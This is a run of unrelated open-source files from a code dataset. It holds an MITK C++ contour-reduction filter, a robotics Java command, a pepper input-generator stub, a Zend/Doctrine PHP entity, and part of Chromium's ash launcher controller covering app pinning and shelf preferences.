l = v2 * (normalized v1)
b. There a three possibilities for the distance then:
d = sqrt(lenght(v2)^2 - l^2) if l > 0 and l < length(v1)
d = lenght(v2-v1) if l > 0 and l > lenght(v1)
d = length(v2) if l < 0 because v2 is then pointing in a different direction than v1
4. Memorize the point with the biggest distance and create two new line segments with it at the end of the iteration
and put it into the stack
5. If the distance value D <= m_Tolerance, then add the start and end index and the corresponding points to the reduced ones
*/
//First of all set tolerance if none is specified
if(m_Tolerance < 0)
{
if(m_MaxSpacing > 0)
{
m_Tolerance = m_MinSpacing;
}
else
{
m_Tolerance = 1.5;
}
}
std::stack<LineSegment> lineSegments;
//1. Divide in line segments
LineSegment ls2;
ls2.StartIndex = cell[cellSize/2];
ls2.EndIndex = cell[cellSize-1];
lineSegments.push(ls2);
LineSegment ls1;
ls1.StartIndex = cell[0];
ls1.EndIndex = cell[cellSize/2];
lineSegments.push(ls1);
LineSegment currentSegment;
double v1[3];
double v2[3];
double tempV[3];
double lenghtV1;
double currentMaxDistance (0);
vtkIdType currentMaxDistanceIndex (0);
double l;
double d;
vtkIdType pointId (0);
//Add the start index to the reduced points. From now on just the end indices will be added
pointId = reducedPoints->InsertNextPoint(points->GetPoint(cell[0]));
reducedPolygon->GetPointIds()->InsertNextId(pointId);
while (!lineSegments.empty())
{
currentSegment = lineSegments.top();
lineSegments.pop();
//2. Create vectors
points->GetPoint(currentSegment.EndIndex, tempV);
points->GetPoint(currentSegment.StartIndex, v1);
v1[0] = tempV[0]-v1[0];
v1[1] = tempV[1]-v1[1];
v1[2] = tempV[2]-v1[2];
lenghtV1 = vtkMath::Norm(v1);
vtkMath::Normalize(v1);
int range = currentSegment.EndIndex - currentSegment.StartIndex;
for (int i = 1; i < abs(range); ++i)
{
points->GetPoint(currentSegment.StartIndex+i, tempV);
points->GetPoint(currentSegment.StartIndex, v2);
v2[0] = tempV[0]-v2[0];
v2[1] = tempV[1]-v2[1];
v2[2] = tempV[2]-v2[2];
//3. Calculate the distance
l = vtkMath::Dot(v2, v1);
d = vtkMath::Norm(v2);
if (l > 0 && l < lenghtV1)
{
d = sqrt((d*d-l*l));
}
else if (l > 0 && l > lenghtV1)
{
tempV[0] = lenghtV1*v1[0] - v2[0];
tempV[1] = lenghtV1*v1[1] - v2[1];
tempV[2] = lenghtV1*v1[2] - v2[2];
d = vtkMath::Norm(tempV);
}
//4. Memorize maximum distance
if (d > currentMaxDistance)
{
currentMaxDistance = d;
currentMaxDistanceIndex = currentSegment.StartIndex+i;
}
}
//4. & 5.
if (currentMaxDistance <= m_Tolerance)
{
//double temp[3];
int segmentLenght = currentSegment.EndIndex - currentSegment.StartIndex;
if (segmentLenght > (int)m_MaxSegmentLenght)
{
m_MaxSegmentLenght = (unsigned int)segmentLenght;
}
// MITK_INFO<<"Lenght: "<<abs(segmentLenght);
if (abs(segmentLenght) > 25)
{
unsigned int newLenght(segmentLenght);
while (newLenght > 25)
{
newLenght = newLenght*0.5;
}
unsigned int divisions = abs(segmentLenght)/newLenght;
// MITK_INFO<<"Divisions: "<<divisions;
for (unsigned int i = 1; i<=divisions; ++i)
{
// MITK_INFO<<"Inserting MIDDLE: "<<(currentSegment.StartIndex + newLenght*i);
pointId = reducedPoints->InsertNextPoint(points->GetPoint(currentSegment.StartIndex + newLenght*i));
reducedPolygon->GetPointIds()->InsertNextId(pointId);
}
}
// MITK_INFO<<"Inserting END: "<<currentSegment.EndIndex;
pointId = reducedPoints->InsertNextPoint(points->GetPoint(currentSegment.EndIndex));
reducedPolygon->GetPointIds()->InsertNextId(pointId);
}
else
{
ls2.StartIndex = currentMaxDistanceIndex;
ls2.EndIndex = currentSegment.EndIndex;
lineSegments.push(ls2);
ls1.StartIndex = currentSegment.StartIndex;
ls1.EndIndex = currentMaxDistanceIndex;
lineSegments.push(ls1);
}
currentMaxDistance = 0;
}
}
bool mitk::ReduceContourSetFilter::CheckForIntersection (vtkIdType* currentCell, vtkIdType currentCellSize, vtkPoints* currentPoints,/* vtkIdType numberOfIntersections, vtkIdType* intersectionPoints,*/ unsigned int currentInputIndex)
{
/*
If we check the current cell for intersections then we have to consider three possibilies:
1. There is another cell among all the other input surfaces which intersects the current polygon:
- That means we have to save the intersection points because these points should not be eliminated
2. There current polygon exists just because of an intersection of another polygon with the current plane defined by the current polygon
- That means the current polygon should not be incorporated and all of its points should be eliminated
3. There is no intersection
- That mean we can just reduce the current polygons points without considering any intersections
*/
for (unsigned int i = 0; i < this->GetNumberOfIndexedInputs(); i++)
{
//Don't check for intersection with the polygon itself
if (i == currentInputIndex) continue;
//Get the next polydata to check for intersection
vtkSmartPointer<vtkPolyData> poly = const_cast<Surface*>( this->GetInput(i) )->GetVtkPolyData();
vtkSmartPointer<vtkCellArray> polygonArray = poly->GetPolys();
polygonArray->InitTraversal();
vtkIdType anotherInputPolygonSize (0);
vtkIdType* anotherInputPolygonIDs(nullptr);
/*
The procedure is:
- Create the equation of the plane, defined by the points of next input
- Calculate the distance of each point of the current polygon to the plane
- If the maximum distance is not bigger than 1.5 of the maximum spacing AND the minimal distance is not bigger
than 0.5 of the minimum spacing then the current contour is an intersection contour
*/
for( polygonArray->InitTraversal(); polygonArray->GetNextCell(anotherInputPolygonSize, anotherInputPolygonIDs);)
{
//Choosing three plane points to calculate the plane vectors
double p1[3];
double p2[3];
double p3[3];
//The plane vectors
double v1[3];
double v2[3] = { 0 };
//The plane normal
double normal[3];
//Create first Vector
poly->GetPoint(anotherInputPolygonIDs[0], p1);
poly->GetPoint(anotherInputPolygonIDs[1], p2);
v1[0] = p2[0]-p1[0];
v1[1] = p2[1]-p1[1];
v1[2] = p2[2]-p1[2];
//Find 3rd point for 2nd vector (The angle between the two plane vectors should be bigger than 30 degrees)
double maxDistance (0);
double minDistance (10000);
for (vtkIdType j = 2; j < anotherInputPolygonSize; j++)
{
poly->GetPoint(anotherInputPolygonIDs[j], p3);
v2[0] = p3[0]-p1[0];
v2[1] = p3[1]-p1[1];
v2[2] = p3[2]-p1[2];
//Calculate the angle between the two vector for the current point
double dotV1V2 = vtkMath::Dot(v1,v2);
double absV1 = sqrt(vtkMath::Dot(v1,v1));
double absV2 = sqrt(vtkMath::Dot(v2,v2));
double cosV1V2 = dotV1V2/(absV1*absV2);
double arccos = acos(cosV1V2);
double degree = vtkMath::DegreesFromRadians(arccos);
//If angle is bigger than 30 degrees break
if (degree > 30) break;
}//for (to find 3rd point)
//Calculate normal of the plane by taking the cross product of the two vectors
vtkMath::Cross(v1,v2,normal);
vtkMath::Normalize(normal);
//Determine position of the plane
double lambda = vtkMath::Dot(normal, p1);
/*
Calculate the distance to the plane for each point of the current polygon
If the distance is zero then save the currentPoint as intersection point
*/
for (vtkIdType k = 0; k < currentCellSize; k++)
{
double currentPoint[3];
currentPoints->GetPoint(currentCell[k], currentPoint);
double tempPoint[3];
tempPoint[0] = normal[0]*currentPoint[0];
tempPoint[1] = normal[1]*currentPoint[1];
tempPoint[2] = normal[2]*currentPoint[2];
double temp = tempPoint[0]+tempPoint[1]+tempPoint[2]-lambda;
double distance = fabs(temp);
if (distance > maxDistance)
{
maxDistance = distance;
}
if (distance < minDistance)
{
minDistance = distance;
}
}//for (to calculate distance and intersections with currentPolygon)
if (maxDistance < 1.5*m_MaxSpacing && minDistance < 0.5*m_MinSpacing)
{
return false;
}
//Because we are considering the plane defined by the acual input polygon only one iteration is sufficient
//We do not need to consider each cell of the plane
break;
}//for (to traverse through all cells of actualInputPolyData)
}//for (to iterate through all inputs)
return true;
}
void mitk::ReduceContourSetFilter::GenerateOutputInformation()
{
Superclass::GenerateOutputInformation();
}
void mitk::ReduceContourSetFilter::Reset()
{
for (unsigned int i = 0; i < this->GetNumberOfIndexedInputs(); i++)
{
this->PopBackInput();
}
this->SetNumberOfIndexedInputs(0);
this->SetNumberOfIndexedOutputs(0);
mitk::Surface::Pointer output = mitk::Surface::New();
this->SetNthOutput(0, output.GetPointer());
m_NumberOfPointsAfterReduction = 0;
}
void mitk::ReduceContourSetFilter::SetUseProgressBar(bool status)
{
this->m_UseProgressBar = status;
}
void mitk::ReduceContourSetFilter::SetProgressStepSize(unsigned int stepSize)
{
this->m_ProgressStepSize = stepSize;
}
| NifTK/MITK | Modules/SurfaceInterpolation/mitkReduceContourSetFilter.cpp | C++ | bsd-3-clause | 16,276 |
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package FRC867.Nano2014.commands;
/**
*
* @author Mike
*/
public class StartCompressor extends CommandBase {
public StartCompressor() {
requires(compressor);
}
// Called just before this Command runs the first time
protected void initialize() {
}
// Called repeatedly when this Command is scheduled to run
protected void execute() {
compressor.Start();
}
// Make this return true when this Command no longer needs to run execute()
protected boolean isFinished() {
return true;
}
// Called once after isFinished returns true
protected void end() {
}
// Called when another command which requires one or more of the same
// subsystems is scheduled to run
protected void interrupted() {
}
}
| FRC867/Nano2014 | src/FRC867/Nano2014/commands/StartCompressor.java | Java | bsd-3-clause | 983 |
#include <apps_sfdl_gen/ramput_fast_micro_v_inp_gen.h>
#include <apps_sfdl_hw/ramput_fast_micro_v_inp_gen_hw.h>
#include <apps_sfdl_gen/ramput_fast_micro_cons.h>
//This file will NOT be overwritten by the code generator, if it already
//exists. make clean will also not remove this file.
ramput_fast_microVerifierInpGenHw::ramput_fast_microVerifierInpGenHw(Venezia* v_)
{
v = v_;
compiler_implementation.v = v_;
}
//Refer to apps_sfdl_gen/ramput_fast_micro_cons.h for constants to use when generating input.
void ramput_fast_microVerifierInpGenHw::create_input(mpq_t* input_q, int num_inputs)
{
#if IS_REDUCER == 0
//Default implementation is provided by compiler
compiler_implementation.create_input(input_q, num_inputs);
#endif
// states that should be persisted and may not be generated everytime should be created here.
if (generate_states) {
}
}
| srinathtv/pepper | pepper/apps_sfdl_hw/ramput_fast_micro_v_inp_gen_hw.cpp | C++ | bsd-3-clause | 873 |
<?php
namespace Book\Entity;
use Doctrine\ORM\Mapping as ORM;
use Zend\Form\Annotation\Hydrator;
use Zend\Stdlib\Hydrator\ClassMethods;
use Zend\Stdlib\Hydrator as Hy;
/**
* Author
*
* @ORM\Table(name="author")
* @ORM\Entity
* @ORM\Entity(repositoryClass="Book\Repository\AuthorRepository")
*/
class Author
{
public function __construct($options = null)
{
$hydrator = new ClassMethods(); // jeito certo de usar os getters e setters automaticos do doctrine
$hydrator->hydrate($options, $this);
//Configurator::configure($this, $options);
}
/**
* @var integer
*
* @ORM\Column(name="id", type="integer", nullable=false)
* @ORM\Id
* @ORM\GeneratedValue(strategy="IDENTITY")
*/
private $id;
/**
* @var string
*
* @ORM\Column(name="name", type="string", length=255, nullable=false)
*/
private $name = '0';
/**
* @var string
*
* @ORM\Column(name="email", type="string", length=255, nullable=false)
*/
private $email = '0';
/**
* @return int
*/
public function getId()
{
return $this->id;
}
/**
* @param int $id
*/
public function setId($id)
{
$this->id = $id;
}
/**
* @return string
*/
public function getName()
{
return $this->name;
}
/**
* @param string $name
*/
public function setName($name)
{
$this->name = $name;
}
/**
* @return string
*/
public function getEmail()
{
return $this->email;
}
/**
* @param string $email
*/
public function setEmail($email)
{
$this->email = $email;
}
public function toArray()
{
return array('id' => $this->getId(),
'name' => $this->getName(),
'email' => $this->getEmail()
);
}
}
| fxcosta/Zend2SkeletonForProof | module/Book/src/Book/Entity/Author.php | PHP | bsd-3-clause | 1,933 |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/ui/ash/launcher/chrome_launcher_controller_per_browser.h"
#include <vector>
#include "ash/launcher/launcher_model.h"
#include "ash/root_window_controller.h"
#include "ash/shelf/shelf_widget.h"
#include "ash/shell.h"
#include "ash/wm/window_util.h"
#include "base/command_line.h"
#include "base/strings/string_number_conversions.h"
#include "base/values.h"
#include "chrome/browser/app_mode/app_mode_utils.h"
#include "chrome/browser/defaults.h"
#include "chrome/browser/extensions/app_icon_loader_impl.h"
#include "chrome/browser/extensions/extension_service.h"
#include "chrome/browser/extensions/extension_system.h"
#include "chrome/browser/prefs/incognito_mode_prefs.h"
#include "chrome/browser/prefs/pref_service_syncable.h"
#include "chrome/browser/prefs/scoped_user_pref_update.h"
#include "chrome/browser/profiles/profile.h"
#include "chrome/browser/profiles/profile_manager.h"
#include "chrome/browser/ui/ash/app_sync_ui_state.h"
#include "chrome/browser/ui/ash/chrome_launcher_prefs.h"
#include "chrome/browser/ui/ash/launcher/chrome_launcher_app_menu_item.h"
#include "chrome/browser/ui/ash/launcher/launcher_app_tab_helper.h"
#include "chrome/browser/ui/ash/launcher/launcher_context_menu.h"
#include "chrome/browser/ui/ash/launcher/launcher_item_controller.h"
#include "chrome/browser/ui/ash/launcher/shell_window_launcher_controller.h"
#include "chrome/browser/ui/browser.h"
#include "chrome/browser/ui/browser_commands.h"
#include "chrome/browser/ui/browser_finder.h"
#include "chrome/browser/ui/browser_tabstrip.h"
#include "chrome/browser/ui/browser_window.h"
#include "chrome/browser/ui/extensions/application_launch.h"
#include "chrome/browser/ui/extensions/extension_enable_flow.h"
#include "chrome/browser/ui/host_desktop.h"
#include "chrome/browser/ui/tabs/tab_strip_model.h"
#include "chrome/browser/web_applications/web_app.h"
#include "chrome/common/chrome_notification_types.h"
#include "chrome/common/chrome_switches.h"
#include "chrome/common/extensions/extension.h"
#include "chrome/common/extensions/manifest_handlers/icons_handler.h"
#include "chrome/common/pref_names.h"
#include "chrome/common/url_constants.h"
#include "content/public/browser/navigation_entry.h"
#include "content/public/browser/notification_service.h"
#include "content/public/browser/web_contents.h"
#include "extensions/common/url_pattern.h"
#include "grit/theme_resources.h"
#include "ui/aura/root_window.h"
#include "ui/aura/window.h"
using content::WebContents;
using extensions::Extension;
namespace {
// Item controller for an app shortcut. Shortcuts track app and launcher ids,
// but do not have any associated windows (opening a shortcut will replace the
// item with the appropriate LauncherItemController type).
class AppShortcutLauncherItemController : public LauncherItemController {
public:
AppShortcutLauncherItemController(
const std::string& app_id,
ChromeLauncherControllerPerBrowser* controller)
: LauncherItemController(TYPE_SHORTCUT, app_id, controller) {
// Google Drive should just refocus to it's main app UI.
// TODO(davemoore): Generalize this for other applications.
if (app_id == "apdfllckaahabafndbhieahigkjlhalf") {
const Extension* extension =
launcher_controller()->GetExtensionForAppID(app_id);
refocus_url_ = GURL(extension->launch_web_url() + "*");
}
}
virtual ~AppShortcutLauncherItemController() {}
// LauncherItemController overrides:
virtual string16 GetTitle() OVERRIDE {
return GetAppTitle();
}
virtual bool HasWindow(aura::Window* window) const OVERRIDE {
return false;
}
virtual bool IsOpen() const OVERRIDE {
return false;
}
virtual bool IsVisible() const OVERRIDE {
return false;
}
virtual void Launch(int event_flags) OVERRIDE {
launcher_controller()->LaunchApp(app_id(), event_flags);
}
virtual void Activate() OVERRIDE {
launcher_controller()->ActivateApp(app_id(), ui::EF_NONE);
}
virtual void Close() OVERRIDE {
// TODO: maybe should treat as unpin?
}
virtual void Clicked(const ui::Event& event) OVERRIDE {
Activate();
}
virtual void OnRemoved() OVERRIDE {
// AppShortcutLauncherItemController is unowned; delete on removal.
delete this;
}
virtual void LauncherItemChanged(
int model_index,
const ash::LauncherItem& old_item) OVERRIDE {
}
virtual ChromeLauncherAppMenuItems GetApplicationList() OVERRIDE {
ChromeLauncherAppMenuItems items;
return items.Pass();
}
// Stores the optional refocus url pattern for this item.
const GURL& refocus_url() const { return refocus_url_; }
void set_refocus_url(const GURL& refocus_url) { refocus_url_ = refocus_url; }
private:
GURL refocus_url_;
DISALLOW_COPY_AND_ASSIGN(AppShortcutLauncherItemController);
};
std::string GetPrefKeyForRootWindow(aura::RootWindow* root_window) {
gfx::Display display = gfx::Screen::GetScreenFor(
root_window)->GetDisplayNearestWindow(root_window);
DCHECK(display.is_valid());
return base::Int64ToString(display.id());
}
void UpdatePerDisplayPref(PrefService* pref_service,
aura::RootWindow* root_window,
const char* pref_key,
const std::string& value) {
std::string key = GetPrefKeyForRootWindow(root_window);
if (key.empty())
return;
DictionaryPrefUpdate update(pref_service, prefs::kShelfPreferences);
base::DictionaryValue* shelf_prefs = update.Get();
base::DictionaryValue* prefs = NULL;
if (!shelf_prefs->GetDictionary(key, &prefs)) {
prefs = new base::DictionaryValue();
shelf_prefs->Set(key, prefs);
}
prefs->SetStringWithoutPathExpansion(pref_key, value);
}
// Returns a pref value in |pref_service| for the display of |root_window|. The
// pref value is stored in |local_path| and |path|, but |pref_service| may have
// per-display preferences and the value can be specified by policy. Here is
// the priority:
// * A value managed by policy. This is a single value that applies to all
// displays.
// * A user-set value for the specified display.
// * A user-set value in |local_path| or |path|, if no per-display settings are
// ever specified (see http://crbug.com/173719 for why). |local_path| is
// preferred. See comment in |kShelfAlignment| as to why we consider two
// prefs and why |local_path| is preferred.
// * A value recommended by policy. This is a single value that applies to all
// root windows.
// * The default value for |local_path| if the value is not recommended by
// policy.
std::string GetPrefForRootWindow(PrefService* pref_service,
aura::RootWindow* root_window,
const char* local_path,
const char* path) {
const PrefService::Preference* local_pref =
pref_service->FindPreference(local_path);
const std::string value(pref_service->GetString(local_path));
if (local_pref->IsManaged())
return value;
std::string pref_key = GetPrefKeyForRootWindow(root_window);
bool has_per_display_prefs = false;
if (!pref_key.empty()) {
const base::DictionaryValue* shelf_prefs = pref_service->GetDictionary(
prefs::kShelfPreferences);
const base::DictionaryValue* display_pref = NULL;
std::string per_display_value;
if (shelf_prefs->GetDictionary(pref_key, &display_pref) &&
display_pref->GetString(path, &per_display_value))
return per_display_value;
// If the pref for the specified display is not found, scan the whole prefs
// and check if the prefs for other display is already specified.
std::string unused_value;
for (base::DictionaryValue::Iterator iter(*shelf_prefs);
!iter.IsAtEnd(); iter.Advance()) {
const base::DictionaryValue* display_pref = NULL;
if (iter.value().GetAsDictionary(&display_pref) &&
display_pref->GetString(path, &unused_value)) {
has_per_display_prefs = true;
break;
}
}
}
if (local_pref->IsRecommended() || !has_per_display_prefs)
return value;
const base::Value* default_value =
pref_service->GetDefaultPrefValue(local_path);
std::string default_string;
default_value->GetAsString(&default_string);
return default_string;
}
// If prefs have synced and no user-set value exists at |local_path|, the value
// from |synced_path| is copied to |local_path|.
void MaybePropagatePrefToLocal(PrefServiceSyncable* pref_service,
const char* local_path,
const char* synced_path) {
if (!pref_service->FindPreference(local_path)->HasUserSetting() &&
pref_service->IsSyncing()) {
// First time the user is using this machine, propagate from remote to
// local.
pref_service->SetString(local_path, pref_service->GetString(synced_path));
}
}
} // namespace
// ChromeLauncherControllerPerBrowser -----------------------------------------
ChromeLauncherControllerPerBrowser::ChromeLauncherControllerPerBrowser(
Profile* profile,
ash::LauncherModel* model)
: model_(model),
profile_(profile),
app_sync_ui_state_(NULL) {
if (!profile_) {
// Use the original profile as on chromeos we may get a temporary off the
// record profile.
profile_ = ProfileManager::GetDefaultProfile()->GetOriginalProfile();
app_sync_ui_state_ = AppSyncUIState::Get(profile_);
if (app_sync_ui_state_)
app_sync_ui_state_->AddObserver(this);
}
model_->AddObserver(this);
// Right now ash::Shell isn't created for tests.
// TODO(mukai): Allows it to observe display change and write tests.
if (ash::Shell::HasInstance())
ash::Shell::GetInstance()->display_controller()->AddObserver(this);
// TODO(stevenjb): Find a better owner for shell_window_controller_?
shell_window_controller_.reset(new ShellWindowLauncherController(this));
app_tab_helper_.reset(new LauncherAppTabHelper(profile_));
app_icon_loader_.reset(new extensions::AppIconLoaderImpl(
profile_, extension_misc::EXTENSION_ICON_SMALL, this));
notification_registrar_.Add(this,
chrome::NOTIFICATION_EXTENSION_LOADED,
content::Source<Profile>(profile_));
notification_registrar_.Add(this,
chrome::NOTIFICATION_EXTENSION_UNLOADED,
content::Source<Profile>(profile_));
pref_change_registrar_.Init(profile_->GetPrefs());
pref_change_registrar_.Add(
prefs::kPinnedLauncherApps,
base::Bind(&ChromeLauncherControllerPerBrowser::
UpdateAppLaunchersFromPref,
base::Unretained(this)));
pref_change_registrar_.Add(
prefs::kShelfAlignmentLocal,
base::Bind(&ChromeLauncherControllerPerBrowser::
SetShelfAlignmentFromPrefs,
base::Unretained(this)));
pref_change_registrar_.Add(
prefs::kShelfAutoHideBehaviorLocal,
base::Bind(&ChromeLauncherControllerPerBrowser::
SetShelfAutoHideBehaviorFromPrefs,
base::Unretained(this)));
pref_change_registrar_.Add(
prefs::kShelfPreferences,
base::Bind(&ChromeLauncherControllerPerBrowser::
SetShelfBehaviorsFromPrefs,
base::Unretained(this)));
}
ChromeLauncherControllerPerBrowser::~ChromeLauncherControllerPerBrowser() {
// Reset the shell window controller here since it has a weak pointer to
// this.
shell_window_controller_.reset();
for (std::set<ash::Launcher*>::iterator iter = launchers_.begin();
iter != launchers_.end();
++iter)
(*iter)->shelf_widget()->shelf_layout_manager()->RemoveObserver(this);
model_->RemoveObserver(this);
if (ash::Shell::HasInstance())
ash::Shell::GetInstance()->display_controller()->RemoveObserver(this);
for (IDToItemControllerMap::iterator i = id_to_item_controller_map_.begin();
i != id_to_item_controller_map_.end(); ++i) {
i->second->OnRemoved();
model_->RemoveItemAt(model_->ItemIndexByID(i->first));
}
if (ash::Shell::HasInstance())
ash::Shell::GetInstance()->RemoveShellObserver(this);
if (app_sync_ui_state_)
app_sync_ui_state_->RemoveObserver(this);
PrefServiceSyncable::FromProfile(profile_)->RemoveObserver(this);
}
void ChromeLauncherControllerPerBrowser::Init() {
UpdateAppLaunchersFromPref();
// TODO(sky): update unit test so that this test isn't necessary.
if (ash::Shell::HasInstance()) {
SetShelfAutoHideBehaviorFromPrefs();
SetShelfAlignmentFromPrefs();
PrefServiceSyncable* prefs = PrefServiceSyncable::FromProfile(profile_);
if (!prefs->FindPreference(prefs::kShelfAlignmentLocal)->HasUserSetting() ||
!prefs->FindPreference(prefs::kShelfAutoHideBehaviorLocal)->
HasUserSetting()) {
// This causes OnIsSyncingChanged to be called when the value of
// PrefService::IsSyncing() changes.
prefs->AddObserver(this);
}
ash::Shell::GetInstance()->AddShellObserver(this);
}
}
ChromeLauncherControllerPerApp*
ChromeLauncherControllerPerBrowser::GetPerAppInterface() {
return NULL;
}
ash::LauncherID ChromeLauncherControllerPerBrowser::CreateTabbedLauncherItem(
LauncherItemController* controller,
IncognitoState is_incognito,
ash::LauncherItemStatus status) {
ash::LauncherID id = model_->next_id();
DCHECK(!HasItemController(id));
DCHECK(controller);
id_to_item_controller_map_[id] = controller;
controller->set_launcher_id(id);
ash::LauncherItem item;
item.type = ash::TYPE_TABBED;
item.is_incognito = (is_incognito == STATE_INCOGNITO);
item.status = status;
model_->Add(item);
return id;
}
ash::LauncherID ChromeLauncherControllerPerBrowser::CreateAppLauncherItem(
LauncherItemController* controller,
const std::string& app_id,
ash::LauncherItemStatus status) {
DCHECK(controller);
return InsertAppLauncherItem(controller, app_id, status,
model_->item_count());
}
void ChromeLauncherControllerPerBrowser::SetItemStatus(
ash::LauncherID id,
ash::LauncherItemStatus status) {
int index = model_->ItemIndexByID(id);
DCHECK_GE(index, 0);
ash::LauncherItem item = model_->items()[index];
item.status = status;
model_->Set(index, item);
}
void ChromeLauncherControllerPerBrowser::SetItemController(
ash::LauncherID id,
LauncherItemController* controller) {
IDToItemControllerMap::iterator iter = id_to_item_controller_map_.find(id);
DCHECK(iter != id_to_item_controller_map_.end());
iter->second->OnRemoved();
iter->second = controller;
controller->set_launcher_id(id);
}
void ChromeLauncherControllerPerBrowser::CloseLauncherItem(
ash::LauncherID id) {
if (IsPinned(id)) {
// Create a new shortcut controller.
IDToItemControllerMap::iterator iter = id_to_item_controller_map_.find(id);
DCHECK(iter != id_to_item_controller_map_.end());
SetItemStatus(id, ash::STATUS_CLOSED);
std::string app_id = iter->second->app_id();
iter->second->OnRemoved();
iter->second = new AppShortcutLauncherItemController(app_id, this);
iter->second->set_launcher_id(id);
} else {
LauncherItemClosed(id);
}
}
void ChromeLauncherControllerPerBrowser::Unpin(ash::LauncherID id) {
DCHECK(HasItemController(id));
LauncherItemController* controller = id_to_item_controller_map_[id];
if (controller->type() == LauncherItemController::TYPE_APP) {
int index = model_->ItemIndexByID(id);
ash::LauncherItem item = model_->items()[index];
item.type = ash::TYPE_PLATFORM_APP;
model_->Set(index, item);
} else {
LauncherItemClosed(id);
}
if (CanPin())
PersistPinnedState();
}
void ChromeLauncherControllerPerBrowser::Pin(ash::LauncherID id) {
DCHECK(HasItemController(id));
int index = model_->ItemIndexByID(id);
ash::LauncherItem item = model_->items()[index];
if (item.type != ash::TYPE_PLATFORM_APP)
return;
item.type = ash::TYPE_APP_SHORTCUT;
model_->Set(index, item);
if (CanPin())
PersistPinnedState();
}
bool ChromeLauncherControllerPerBrowser::IsPinned(ash::LauncherID id) {
int index = model_->ItemIndexByID(id);
ash::LauncherItemType type = model_->items()[index].type;
return type == ash::TYPE_APP_SHORTCUT;
}
void ChromeLauncherControllerPerBrowser::TogglePinned(ash::LauncherID id) {
if (!HasItemController(id))
return; // May happen if item closed with menu open.
if (IsPinned(id))
Unpin(id);
else
Pin(id);
}
bool ChromeLauncherControllerPerBrowser::IsPinnable(ash::LauncherID id) const {
int index = model_->ItemIndexByID(id);
if (index == -1)
return false;
ash::LauncherItemType type = model_->items()[index].type;
return ((type == ash::TYPE_APP_SHORTCUT || type == ash::TYPE_PLATFORM_APP) &&
CanPin());
}
void ChromeLauncherControllerPerBrowser::LockV1AppWithID(
const std::string& app_id) {
}
void ChromeLauncherControllerPerBrowser::UnlockV1AppWithID(
const std::string& app_id) {
}
void ChromeLauncherControllerPerBrowser::Launch(
ash::LauncherID id, int event_flags) {
if (!HasItemController(id))
return; // In case invoked from menu and item closed while menu up.
id_to_item_controller_map_[id]->Launch(event_flags);
}
void ChromeLauncherControllerPerBrowser::Close(ash::LauncherID id) {
if (!HasItemController(id))
return; // May happen if menu closed.
id_to_item_controller_map_[id]->Close();
}
bool ChromeLauncherControllerPerBrowser::IsOpen(ash::LauncherID id) {
if (!HasItemController(id))
return false;
return id_to_item_controller_map_[id]->IsOpen();
}
bool ChromeLauncherControllerPerBrowser::IsPlatformApp(ash::LauncherID id) {
if (!HasItemController(id))
return false;
std::string app_id = GetAppIDForLauncherID(id);
const Extension* extension = GetExtensionForAppID(app_id);
DCHECK(extension);
return extension->is_platform_app();
}
void ChromeLauncherControllerPerBrowser::LaunchApp(const std::string& app_id,
int event_flags) {
// |extension| could be NULL when it is being unloaded for updating.
const Extension* extension = GetExtensionForAppID(app_id);
if (!extension)
return;
const ExtensionService* service =
extensions::ExtensionSystem::Get(profile_)->extension_service();
if (!service->IsExtensionEnabledForLauncher(app_id)) {
// Do nothing if there is already a running enable flow.
if (extension_enable_flow_)
return;
extension_enable_flow_.reset(
new ExtensionEnableFlow(profile_, app_id, this));
extension_enable_flow_->StartForNativeWindow(NULL);
return;
}
chrome::OpenApplication(chrome::AppLaunchParams(GetProfileForNewWindows(),
extension,
event_flags));
}
void ChromeLauncherControllerPerBrowser::ActivateApp(const std::string& app_id,
int event_flags) {
if (app_id == extension_misc::kChromeAppId) {
OnBrowserShortcutClicked(event_flags);
return;
}
// If there is an existing non-shortcut controller for this app, open it.
ash::LauncherID id = GetLauncherIDForAppID(app_id);
URLPattern refocus_pattern(URLPattern::SCHEME_ALL);
refocus_pattern.SetMatchAllURLs(true);
if (id > 0) {
LauncherItemController* controller = id_to_item_controller_map_[id];
if (controller->type() != LauncherItemController::TYPE_SHORTCUT) {
controller->Activate();
return;
}
AppShortcutLauncherItemController* app_controller =
static_cast<AppShortcutLauncherItemController*>(controller);
const GURL refocus_url = app_controller->refocus_url();
if (!refocus_url.is_empty())
refocus_pattern.Parse(refocus_url.spec());
}
// Check if there are any open tabs for this app.
AppIDToWebContentsListMap::iterator app_i =
app_id_to_web_contents_list_.find(app_id);
if (app_i != app_id_to_web_contents_list_.end()) {
for (WebContentsList::iterator tab_i = app_i->second.begin();
tab_i != app_i->second.end();
++tab_i) {
WebContents* tab = *tab_i;
const GURL tab_url = tab->GetURL();
if (refocus_pattern.MatchesURL(tab_url)) {
Browser* browser = chrome::FindBrowserWithWebContents(tab);
TabStripModel* tab_strip = browser->tab_strip_model();
int index = tab_strip->GetIndexOfWebContents(tab);
DCHECK_NE(TabStripModel::kNoTab, index);
tab_strip->ActivateTabAt(index, false);
browser->window()->Show();
ash::wm::ActivateWindow(browser->window()->GetNativeWindow());
return;
}
}
}
LaunchApp(app_id, event_flags);
}
extensions::ExtensionPrefs::LaunchType
ChromeLauncherControllerPerBrowser::GetLaunchType(ash::LauncherID id) {
DCHECK(HasItemController(id));
const Extension* extension = GetExtensionForAppID(
id_to_item_controller_map_[id]->app_id());
return profile_->GetExtensionService()->extension_prefs()->GetLaunchType(
extension,
extensions::ExtensionPrefs::LAUNCH_DEFAULT);
}
std::string ChromeLauncherControllerPerBrowser::GetAppID(
content::WebContents* tab) {
return app_tab_helper_->GetAppID(tab);
}
ash::LauncherID ChromeLauncherControllerPerBrowser::GetLauncherIDForAppID(
const std::string& app_id) {
for (IDToItemControllerMap::const_iterator i =
id_to_item_controller_map_.begin();
i != id_to_item_controller_map_.end(); ++i) {
if (i->second->type() == LauncherItemController::TYPE_APP_PANEL)
continue; // Don't include panels
if (i->second->app_id() == app_id)
return i->first;
}
return 0;
}
std::string ChromeLauncherControllerPerBrowser::GetAppIDForLauncherID(
ash::LauncherID id) {
DCHECK(HasItemController(id));
return id_to_item_controller_map_[id]->app_id();
}
void ChromeLauncherControllerPerBrowser::SetAppImage(
const std::string& id,
const gfx::ImageSkia& image) {
// TODO: need to get this working for shortcuts.
for (IDToItemControllerMap::const_iterator i =
id_to_item_controller_map_.begin();
i != id_to_item_controller_map_.end(); ++i) {
if (i->second->app_id() != id)
continue;
int index = model_->ItemIndexByID(i->first);
